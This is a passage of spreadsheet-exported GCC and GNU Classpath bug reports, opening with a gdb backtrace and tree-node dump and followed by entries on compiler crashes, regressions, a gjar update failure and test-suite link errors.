 #9  0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1bb8) at gtype-cp.h:177
 #10 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1af8) at gtype-cp.h:177
 #11 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1a38) at gtype-cp.h:177
 #12 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1978) at gtype-cp.h:177
 #13 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac18b8) at gtype-cp.h:177
 #14 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac17f8) at gtype-cp.h:177
 #15 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1738) at gtype-cp.h:177
 #16 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1678) at gtype-cp.h:177
 #17 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac15b8) at gtype-cp.h:177
 #18 0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac14f8) at gtype-cp.h:177
 .... and so on....
 (gdb) print *t
 $1 = {common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST side_effects_flag = 0 constant_flag = 0 addressable_flag = 0
     volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0 asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0
     static_flag = 0 public_flag = 0 private_flag = 0 protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0
     lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0} int_cst = {
     common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST side_effects_flag = 0 constant_flag = 0 addressable_flag = 0
       volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0 asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0
       static_flag = 0 public_flag = 0 private_flag = 0 protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0
       lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0}
     rtl = 0x41ac20f0 int_cst = {low = 1101799832 high = 0}} real_cst = {common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST
       side_effects_flag = 0 constant_flag = 0 addressable_flag = 0 volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0
       asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0 static_flag = 0 public_flag = 0 private_flag = 0
       protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0 lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0
       lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0} rtl = 0x41ac20f0 real_cst_ptr = 0x41ac2198} vector = {common = {
       chain = 0x41ac2288 type = 0x0 code = TREE_LIST side_effects_flag = 0 constant_flag = 0 addressable_flag = 0
       volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0 asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0
       static_flag = 0 public_flag = 0 private_flag = 0 protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0
       lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0}
     rtl = 0x41ac20f0 elements = 0x41ac2198} string = {common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST
       side_effects_flag = 0 constant_flag = 0 addressable_flag = 0 volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0
       asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0 static_flag = 0 public_flag = 0 private_flag = 0
       protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0 lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0
       lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0} rtl = 0x41ac20f0 length = 1101799832 pointer = 0x0} complex = {
     common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST side_effects_flag = 0 constant_flag = 0 addressable_flag = 0
       volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0 asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0
       static_flag = 0 public_flag = 0 private_flag = 0 protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0
       lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0}
     rtl = 0x41ac20f0 real = 0x41ac2198 imag = 0x0} identifier = {common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST
       side_effects_flag = 0 constant_flag = 0 addressable_flag = 0 volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0
       asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0 static_flag = 0 public_flag = 0 private_flag = 0
       protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0 lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0
       lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0} id = {len = 1101799664 str = 0x41ac2198 }} decl = {common = {
       chain = 0x41ac2288 type = 0x0 code = TREE_LIST side_effects_flag = 0 constant_flag = 0 addressable_flag = 0
       volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0 asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0
       static_flag = 0 public_flag = 0 private_flag = 0 protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0
       lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0} locus = {
       file = 0x41ac20f0  line = 1101799832} uid = 0 size = 0x0 mode = 64 external_flag = 0 nonlocal_flag = 0 regdecl_flag = 0
     inline_flag = 1 bit_field_flag = 0 virtual_flag = 1 ignored_flag = 1 abstract_flag = 1 in_system_header_flag = 1
     common_flag = 1 defer_output = 1 transparent_union = 1 static_ctor_flag = 0 static_dtor_flag = 1 artificial_flag = 0
     weak_flag = 1 non_addr_const_p = 0 no_instrument_function_entry_exit = 1 comdat_flag = 0 malloc_flag = 0 no_limit_stack = 0
     built_in_class = NOT_BUILT_IN pure_flag = 0 pointer_depth = 3 non_addressable = 0 user_align = 1 uninlinable = 1
     thread_local_flag = 0 lang_flag_0 = 0 lang_flag_1 = 1 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0
     lang_flag_6 = 0 lang_flag_7 = 0 u1 = {f = BUILT_IN_ALLOCA i = 0 a = {align = 0 off_align = 0}} size_unit = 0x40832318
     name = 0x0 context = 0x0 arguments = 0x4017f380 result = 0xdc000000 initial = 0x3 abstract_origin = 0x41ac21e0
     assembler_name = 0x0 section_name = 0x0 attributes = 0x4017f540 rtl = 0xd9000000 live_range_rtl = 0x0 u2 = {f = 0x40832318
       r = 0x40832318 t = 0x40832318 i = 1082336024} saved_tree = 0x0 inlined_fns = 0x0 vindex = 0x4017f380
     pointer_alias_set = -603979776 lang_specific = 0x3} type = {common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST
       side_effects_flag = 0 constant_flag = 0 addressable_flag = 0 volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0
       asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0 static_flag = 0 public_flag = 0 private_flag = 0
       protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0 lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0
       lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0} values = 0x41ac20f0 size = 0x41ac2198 size_unit = 0x0
     attributes = 0x0 uid = 1075311936 precision = 434 mode = VOIDmode string_flag = 0 no_force_blk_flag = 0
     needs_constructing_flag = 0 transparent_union_flag = 0 packed_flag = 0 restrict_flag = 0 pointer_depth = 0 lang_flag_0 = 0
     lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 user_align = 0 align = 0
     pointer_to = 0x40832318 reference_to = 0x0 symtab = {address = 0 pointer = 0x0 die = 0x0} name = 0x4017f380
     minval = 0xdc000000 maxval = 0x3 next_variant = 0x41ac21e0 main_variant = 0x0 binfo = 0x0 context = 0x4017f540
     alias_set = -654311424 lang_specific = 0x0} list = {common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST
       side_effects_flag = 0 constant_flag = 0 addressable_flag = 0 volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0
 ---Type  to continue or q  to quit---
       asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0 static_flag = 0 public_flag = 0 private_flag = 0
       protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0 lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0
       lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0} purpose = 0x41ac20f0 value = 0x41ac2198} vec = {common = {
       chain = 0x41ac2288 type = 0x0 code = TREE_LIST side_effects_flag = 0 constant_flag = 0 addressable_flag = 0
       volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0 asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0
       static_flag = 0 public_flag = 0 private_flag = 0 protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0
       lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0}
     length = 1101799664 a = {0x41ac2198}} exp = {common = {chain = 0x41ac2288 type = 0x0 code = TREE_LIST side_effects_flag = 0
       constant_flag = 0 addressable_flag = 0 volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0 asm_written_flag = 0
       unused_0 = 0 used_flag = 0 nothrow_flag = 0 static_flag = 0 public_flag = 0 private_flag = 0 protected_flag = 0
       bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0 lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0
       lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0} complexity = 1101799664 operands = {0x41ac2198}} block = {common = {
       chain = 0x41ac2288 type = 0x0 code = TREE_LIST side_effects_flag = 0 constant_flag = 0 addressable_flag = 0
       volatile_flag = 0 readonly_flag = 0 unsigned_flag = 0 asm_written_flag = 0 unused_0 = 0 used_flag = 0 nothrow_flag = 0
       static_flag = 0 public_flag = 0 private_flag = 0 protected_flag = 0 bounded_flag = 0 deprecated_flag = 0 lang_flag_0 = 0
       lang_flag_1 = 0 lang_flag_2 = 0 lang_flag_3 = 0 lang_flag_4 = 0 lang_flag_5 = 0 lang_flag_6 = 0 unused_1 = 0}
     handler_block_flag = 0 abstract_flag = 1 block_num = 28057840 vars = 0x41ac2198 subblocks = 0x0 supercontext = 0x0
     abstract_origin = 0x4017f540 fragment_origin = 0xd9000000 fragment_chain = 0x0}}
Release:
unknown</t>
  </si>
  <si>
    <t>deller</t>
  </si>
  <si>
    <t>GCC-6229</t>
  </si>
  <si>
    <t>gcc 3.1 namespace lookup seems to fail</t>
  </si>
  <si>
    <t>Uncomment '#define TWO_INSERTERS' in the attached program and everything compiles and runs fine ('manipulator called' is written twice as output).
If the program is compiled as is one obtains the warning
manipulator.cpp: In function `void ns::f()':
manipulator.cpp:29: warning: the address of `void
   ns::manipulator(std::ostringstream&amp;)' will always be `true'
The program writes 'manipulator called' only once.
Obviously a wrong inserter gets called simply by adding an inserter with a non matching signature.
Neither gcc 2.95.3 Borland C++ 5.5.1 nor Comeau 4.3Beta show this behavior.
I have already reported this issue to Red Hat since it is their gcc 3.1-0.23.1 snapshot I am using but got no answer so far.
Release:
gcc 3.1 Snapshot
Environment:
Red Hat Linux 7.2 / i386
How-To-Repeat:
g++ -W -Wall manipulator.cpp -o manipulator
./manipulator</t>
  </si>
  <si>
    <t>peter.klotz99</t>
  </si>
  <si>
    <t>GCC-26341</t>
  </si>
  <si>
    <t>[4.2 Regression] 930217-1.c and 931013-3.c ICE at -O2 and above in add_virtual_operand</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/compile/930217-1.c  -O2  (test for excess errors)
Excess errors:
/Users/regress/tbox/svn-gcc/gcc/testsuite/gcc.c-torture/compile/930217-1.c:16: internal compiler error: in add_virtual_operand at tree-ssa-operands.c:1873</t>
  </si>
  <si>
    <t>CLASSPATH-36636</t>
  </si>
  <si>
    <t>gjar -u doesn't work</t>
  </si>
  <si>
    <t xml:space="preserve"> $ gjar cvf test.zip asm/org/objectweb/asm/AnnotationVisitor.class 
 adding: asm/org/objectweb/asm/AnnotationVisitor.class (in=481) (out=481) (stored 55%)
 $ unzip -l test.zip 
 Archive:  test.zip
   Length     Date   Time    Name
  --------    ----   ----    ----
        60  06-25-08 23:38   META-INF/MANIFEST.MF
       481  06-25-08 23:38   asm/org/objectweb/asm/AnnotationVisitor.class
  --------                   -------
       541                   2 files
 $ gjar uvf test.zip asm/org/objectweb/asm/AnnotationWriter.class 
 adding: asm/org/objectweb/asm/AnnotationWriter.class (in=5344) (out=5344) (stored 52%)
 adding: asm/org/objectweb/asm/AnnotationVisitor.class (in=481) (out=481) (stored 55%)
 $ unzip -l test.zip 
 Archive:  test.zip
   Length     Date   Time    Name
  --------    ----   ----    ----
        60  06-25-08 23:38   META-INF/MANIFEST.MF
       481  06-25-08 23:38   asm/org/objectweb/asm/AnnotationVisitor.class
  --------                   -------
       541                   2 files</t>
  </si>
  <si>
    <t>GCC-48770</t>
  </si>
  <si>
    <t>[4.7 Regression] wrong code with -O -fprofile-arcs -fPIC -fno-dce -fno-forward-propagate -fno-tree-forwprop</t>
  </si>
  <si>
    <t>Created attachment 24101
reduced testcase (from g++.dg/bprob/g++-bprob-1.C)
Compiler output:
$ rm *.gcda
$ g++ -O -fprofile-arcs -fPIC -fno-dce -fno-forward-propagate -fno-tree-forwprop testcase.C
$ valgrind -q ./a.out
==5350== Invalid read of size 8
==5350==    at 0x400D51: test_goto2(int) (testcase.C:10)
==5350==    by 0x400D7E: main (testcase.C:14)
==5350==  Address 0x8 is not stack'd malloc'd or (recently) free'd
Segmentation fault
Fails only when compiled as C++ code.
Tested revisions:
r172940 - fail
4.6 r172337 - OK</t>
  </si>
  <si>
    <t>GCC-7998</t>
  </si>
  <si>
    <t>request for a customer id</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
3.1.1
Environment:
System: Linux flyingfrog.ntf.fr 2.4.18 #6 Mon Aug 5 00:08:33 CEST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /tmp/BUILD/gcc-3.1.1/configure --prefix=/usr/local/packages/gcc-3.1.1 --enable-shared --enable-threads=posix --disable-checking --enable-languages=c++objc --disable-libgcj --disable-nls</t>
  </si>
  <si>
    <t>nma</t>
  </si>
  <si>
    <t>GCC-11133</t>
  </si>
  <si>
    <t>Inernal compiler error when compiling xerxes 2.3.0</t>
  </si>
  <si>
    <t>Hello
here is the data:
&gt; g++ -save-temps -fPIC -DLINUX -D_REENTRANT -c
-I/home/qwer/Qwer/build/dbxml-1.0.14/lib/xerces-c-src_2_3_0/include -g
-DPROJ_XMLPARSER  -DPROJ_XMLUTIL  -DPROJ_PARSERS  -DPROJ_SAX4C  -DPROJ_SAX2 
-DPROJ_DOM  -DPROJ_VALIDATORS -DXML_USE_NATIVE_TRANSCODER
-DXML_USE_INMEM_MESSAGELOADER -DAPP_NO_THREADS -DXML_USE_NO_THREADS
-DXML_USE_NETACCESSOR_SOCKET     -o
/home/qwer/Qwer/build/dbxml-1.0.14/lib/xerces-c-src_2_3_0/obj/LINUX/DOMDocumentImpl.o
DOMDocumentImpl.cpp
/home/qwer/Qwer/build/dbxml-1.0.14/lib/xerces-c-src_2_3_0/include/xercesc/dom/impl/DOMDeepNodeListPool.c:
In method
`xercesc_2_3::DOMDeepNodeListPool::DOMDeepNodeListPool(long
unsigned int bool long unsigned int = 128)':
DOMDocumentImpl.cpp:900:   instantiated from here
/home/qwer/Qwer/build/dbxml-1.0.14/lib/xerces-c-src_2_3_0/include/xercesc/dom/impl/DOMDeepNodeListPool.c:104:
Internal compiler error.
/home/qwer/Qwer/build/dbxml-1.0.14/lib/xerces-c-src_2_3_0/include/xercesc/dom/impl/DOMDeepNodeListPool.c:104:
Please submit a full bug report.
/home/qwer/Qwer/build/dbxml-1.0.14/lib/xerces-c-src_2_3_0/include/xercesc/dom/impl/DOMDeepNodeListPool.c:104:
Internal compiler error:
/home/qwer/Qwer/build/dbxml-1.0.14/lib/xerces-c-src_2_3_0/include/xercesc/dom/impl/DOMDeepNodeListPool.c:104:
See  for instructions.
&gt; gcc -v
Reading specs from /usr/lib/gcc-lib/i386-linux/3.2.1/specs
Configured with: /mnt/data/gcc-3.1/gcc-3.2-3.2.1ds2/src/configure -v
--enable-languages=cc++javaf77protoobjcada --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-java-gc=boehm --enable-objc-gc
i386-linux
Thread model: posix
gcc version 3.2.1 20020924 (Debian prerelease)
&gt; uname -a
Linux jango 2.4.20-xfs #1 SMP Die Dez 10 20:07:25 CET 2002 i686 Intel(R)
Pentium(R) 4 CPU 1.70GHz GenuineIntel GNU/Linux</t>
  </si>
  <si>
    <t>a.w</t>
  </si>
  <si>
    <t>GCC-50273</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7 Regression] -Walign-commons no longer effective</t>
  </si>
  <si>
    <t>Motivated by the thread:
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/1f5e2018f744e5c6
With gfortran 4.4 one got the warning:
  common /global_var/ a b c
                     1
Warning: COMMON 'global_var' at (1) requires 3 bytes of padding at start reorder elements or use -fno-align-commons
However with gfortran 4.5/4.6/4.7 it compiles without warning - not even with -Walign-commons
Note: In 4.5 there was a change in how padding works. Before the padding was added before the too short variable now it is added after the variable. The advantage is a better compatibility with C struct and for common blocks of different length in different scopes (which is valid for blank commons).
Cf. http://gcc.gnu.org/gcc-4.5/changes.html#Fortran
I assume that this change broke the test.
Example (cf. link for a longer C+Fortran example):
subroutine test()
   character :: a
   integer   :: b
   character :: c
   common /global_var/ a b c
   print * a b c
end subroutine test</t>
  </si>
  <si>
    <t>GCC-79565</t>
  </si>
  <si>
    <t>ICE in copy_to_mode_reg at explow.c:612</t>
  </si>
  <si>
    <t>All releases I have suffer from:
$ cat /tmp/ice3.i
typedef float a __attribute__ ((__vector_size__ (16)))
a b d
int __attribute__ ((__vector_size__ (2 * sizeof (int)))) c
void e () { d = __builtin_ia32_cvtpi2ps (b c) }
gcc /tmp/ice3.i -mno-mmx
/tmp/ice3.i: In function â€˜eâ€™:
/tmp/ice3.i:4:17: internal compiler error: in copy_to_mode_reg at explow.c:612
 void e () { d = __builtin_ia32_cvtpi2ps (b c) }
                 ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0x7cabfb copy_to_mode_reg(machine_mode rtx_def*)
	../../gcc/explow.c:612
0xd13f6b ix86_expand_binop_builtin
	../../gcc/config/i386/i386.c:34104
0xd16d4b ix86_expand_args_builtin
	../../gcc/config/i386/i386.c:35018
0xd200c4 ix86_expand_builtin
	../../gcc/config/i386/i386.c:38461
0x6e6a4c expand_builtin(tree_node* rtx_def* rtx_def* machine_mode int)
	../../gcc/builtins.c:6362
0x7dfe18 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
	../../gcc/expr.c:10782
0x7e8ef9 store_expr_with_bounds(tree_node* rtx_def* int bool bool tree_node*)
	../../gcc/expr.c:5552
0x7e9d9f expand_assignment(tree_node* tree_node* bool)
	../../gcc/expr.c:5321
0x702832 expand_call_stmt
	../../gcc/cfgexpand.c:2656
0x702832 expand_gimple_stmt_1
	../../gcc/cfgexpand.c:3571
0x702832 expand_gimple_stmt
	../../gcc/cfgexpand.c:3737
0x7041f5 expand_gimple_basic_block
	../../gcc/cfgexpand.c:5744
0x709066 execute
	../../gcc/cfgexpand.c:6357
Clang is also broken ICC work for that test-case.</t>
  </si>
  <si>
    <t>GCC-1939</t>
  </si>
  <si>
    <t>Re: libstdc++/libstdc++/1930</t>
  </si>
  <si>
    <t xml:space="preserve"> Synopsis: helper function-macro undefined incorrectly
 Responsible-Changed-From-To: unassigned-&gt;gdr
 Responsible-Changed-By: gdr
 Responsible-Changed-When: Sun Feb 11 14:44:36 2001
 Responsible-Changed-Why:
     Analyzed
 State-Changed-From-To: open-&gt;closed
 State-Changed-By: gdr
 State-Changed-When: Sun Feb 11 14:44:36 2001
 State-Changed-Why:
     Fixed in current CVS.
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=libstdc++/1930&amp;database=gcc
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-58716</t>
  </si>
  <si>
    <t>[PATCH] MSP430X check is inverted</t>
  </si>
  <si>
    <t>Created attachment 30996
Use !strcasecmp() to detect when a string is matched (instead of strcasecmp())
r203026 added a check for MSP430X arch MCUs based on a complete listing of supported chips. If a chip is in the list then the msp430x flag should be set.
The change uses strcasecmp() to accomplish the check and this function returns zero on success (match). The if statement checking the result of strcasecmp() is expecting a non-zero value (true) to trigger the branch.
Fix is to NOT strcasecmp's output. Trivial patch against trunk (head) attached.
Symptom was that code generated for the msp430g2412 chip (non-CPUX) contained pushm. Verified that the attached patch resolves that issue.</t>
  </si>
  <si>
    <t>quandary</t>
  </si>
  <si>
    <t>GCC-25327</t>
  </si>
  <si>
    <t>g++.dg/compat/struct-layout-1.exp broken for installed compiler testing</t>
  </si>
  <si>
    <t>The newly added g++.dg/compat/struct-layout-1.exp is broken for installed compiler testing.  You get:
ERROR: tcl error sourcing /scratch/gcc/nightly-2005-12-09-mainline/src/gcc-mainline/gcc/testsuite/g++.dg/compat/struct-layout-1.exp.
ERROR: can't read rootme: no such variable
The corresponding gcc.dg tests were fixed for installed testing by:
2005-05-16  Mark Mitchell  
        * gcc.dg/compat/generate-random.c (config.h): Do not include.
        (limits.h): Include unconditionally.
        (stdlib.h): Likewise.
        * gcc.dg/compat/generate-random_r.c (config.h): Do not include.
        (limits.h): Include unconditionally.
        (stdlib.h): Likewise.
        * gcc.dg/compat/struct-layout-1.exp: Do not link with libiberty.
        * gcc.dg/compat/struct-layout-1_generate.c (config.h): Do not include.
        (limits.h): Include unconditionally.
        (stdlib.h): Likewise.
        (hashtab.h): Do not include.
        (getopt.h): Likewise.
        (stddef.h): Include.
        (hashval_t): Define.
        (struct entry): Add next field.
        (HASH_SIZE): New macro.
        (hash_table): New variable.
        (switchfiles): Do not use xmalloc.
        (mix): New macro.
        (iterative_hash): New function.
        (hasht): Remove.
        (e_exists): New function.
        (e_insert): Likewise.
        (output): Use instead of libiberty hashtable functions.
        (main): Do not use getopt.  Do not call htab_create.</t>
  </si>
  <si>
    <t>GCC-84125</t>
  </si>
  <si>
    <t>[8 Regression] ICE in generic lambda when static_assert argument is implicitly converted to bool</t>
  </si>
  <si>
    <t>struct X{ constexpr operator bool()const{ return true } }
int main(){
    [](auto){
        static_assert(X{})
    }
}
$ g++ -std=c++14 main.cpp 
main.cpp: In lambda function:
main.cpp:5:27: internal compiler error: in build_address at cp/typeck.c:5738
         static_assert(X{})
                           ^
0x63818d build_address(tree_node*)
        ../../gcc/gcc/cp/typeck.c:5738
0x7f1385 add_function_candidate
        ../../gcc/gcc/cp/call.c:2168
0x7f268b add_candidates
        ../../gcc/gcc/cp/call.c:5527
0x7ee84e add_candidates
        ../../gcc/gcc/cp/call.c:5438
0x7ee84e build_user_type_conversion_1
        ../../gcc/gcc/cp/call.c:3851
0x7efbd1 implicit_conversion
        ../../gcc/gcc/cp/call.c:1899
0x7ec420 perform_implicit_conversion_flags(tree_node* tree_node* int int)
        ../../gcc/gcc/cp/call.c:10542
0x976168 finish_static_assert(tree_node* tree_node* unsigned int bool)
        ../../gcc/gcc/cp/semantics.c:8645
0x8dde71 cp_parser_static_assert
        ../../gcc/gcc/cp/parser.c:13893
0x90877e cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:12823
0x908e29 cp_parser_declaration_statement
        ../../gcc/gcc/cp/parser.c:12420
0x8e722b cp_parser_statement
        ../../gcc/gcc/cp/parser.c:10869
0x8e8170 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:11218
0x8e96ae cp_parser_lambda_body
        ../../gcc/gcc/cp/parser.c:10632
0x8e96ae cp_parser_lambda_expression
        ../../gcc/gcc/cp/parser.c:10137
0x8e96ae cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:5257
0x8fb40c cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:7026
0x8fbfe0 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:8281
0x8dcb5f cp_parser_cast_expression
        ../../gcc/gcc/cp/parser.c:9049
0x8dd36a cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:9150
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ g++ --version
g++ (GCC) 8.0.1 20180130 (experimental)
Copyright (C) 2018 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Boost.Hana test suite has some test cases that run into this!
Known to work with GCC 6.3:
$ g++-6 --version
g++-6 (Ubuntu/Linaro 6.3.0-18ubuntu2~16.04) 6.3.0 20170519
Copyright (C) 2016 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>benni.buch</t>
  </si>
  <si>
    <t>GCC-20373</t>
  </si>
  <si>
    <t>INTRINSIC symbols can be given the wrong type</t>
  </si>
  <si>
    <t>INTRINSIC dsqrt
INTEGER dsqrt
END
compiles without giving an error.  This is invalid: and intrinsic always has the
type defined by 13.13 in the standard it may only be reaffirmed but not
overwritten.</t>
  </si>
  <si>
    <t>GCC-3476</t>
  </si>
  <si>
    <t>wrong `const' behaviour</t>
  </si>
  <si>
    <t>This code:
class AAA{}
const AAA a
results in the message:
test.cc:3: uninitialized const `a'
Release:
3.0.1 prerelease
Environment:
Configured with: ../gcc/configure i686-pc-linux-gnu --enable-shared --prefix=/opt --enable-languages=cc++f77
Thread model: single
gcc version 3.0.1 20010626 (prerelease)</t>
  </si>
  <si>
    <t>kunert</t>
  </si>
  <si>
    <t>GCC-5902</t>
  </si>
  <si>
    <t>Gcj fails to parse float</t>
  </si>
  <si>
    <t>Putting a float or double suffix on a literal has higher precedence
than an integer octal constant. This program should compile:
class Foo {
  public static void main(String[] args) {
    System.out.println(019f)
  }
}
And the output should be 19.0. However gcj reports that 9 in an
invalid octal number:
Foo.java:3: Digit out of range in octal literal.
       System.out.println(019f)
                            ^
1 error
Release:
3.1 20020309 (prerelease)
Environment:
System: Linux quaffle 2.4.9-13smp #1 SMP Tue Oct 30 19:57:16 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-threads=posix --prefix=/fpga3/users/eblake/gcc --enable-shared
How-To-Repeat:
Compile the program.</t>
  </si>
  <si>
    <t>ebb9</t>
  </si>
  <si>
    <t>GCC-55605</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/builtins/20010124-1.c compilation  -O2 -flto -flto-partition=none</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc/objdir/gcc/xgcc -B/home/dave/gnu/gcc/objdi
r/gcc/ /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/builtins/20010
124-1.c /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/builtins/2001
0124-1-lib.c /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/builtins
/lib/main.c  -fno-diagnostics-show-caret  -w  -O2 -flto -flto-partition=none  -f
no-tree-loop-distribute-patterns  -lm   -o /home/dave/gnu/gcc/objdir/gcc/testsui
te/gcc/20010124-1.x7    (timeout = 300)
/home/dave/opt/gnu/bin/ld: /home/dave/gnu/gcc/objdir/gcc/testsuite/gcc/20010124-
1.x7: hidden symbol `__sync_synchronize' in /home/dave/gnu/gcc/objdir/gcc/libgcc
.a(linux-atomic.o) is referenced by DSO
/home/dave/opt/gnu/bin/ld: final link failed: Bad value
collect2: error: ld returned 1 exit status
compiler exited with status 1
output is:
/home/dave/opt/gnu/bin/ld: /home/dave/gnu/gcc/objdir/gcc/testsuite/gcc/20010124-
1.x7: hidden symbol `__sync_synchronize' in /home/dave/gnu/gcc/objdir/gcc/libgcc
.a(linux-atomic.o) is referenced by DSO
/home/dave/opt/gnu/bin/ld: final link failed: Bad value
collect2: error: ld returned 1 exit status
FAIL: gcc.c-torture/execute/builtins/20010124-1.c compilation  -O2 -flto -flto-partition=none
There are several thousand similar fails.</t>
  </si>
  <si>
    <t>GCC-63910</t>
  </si>
  <si>
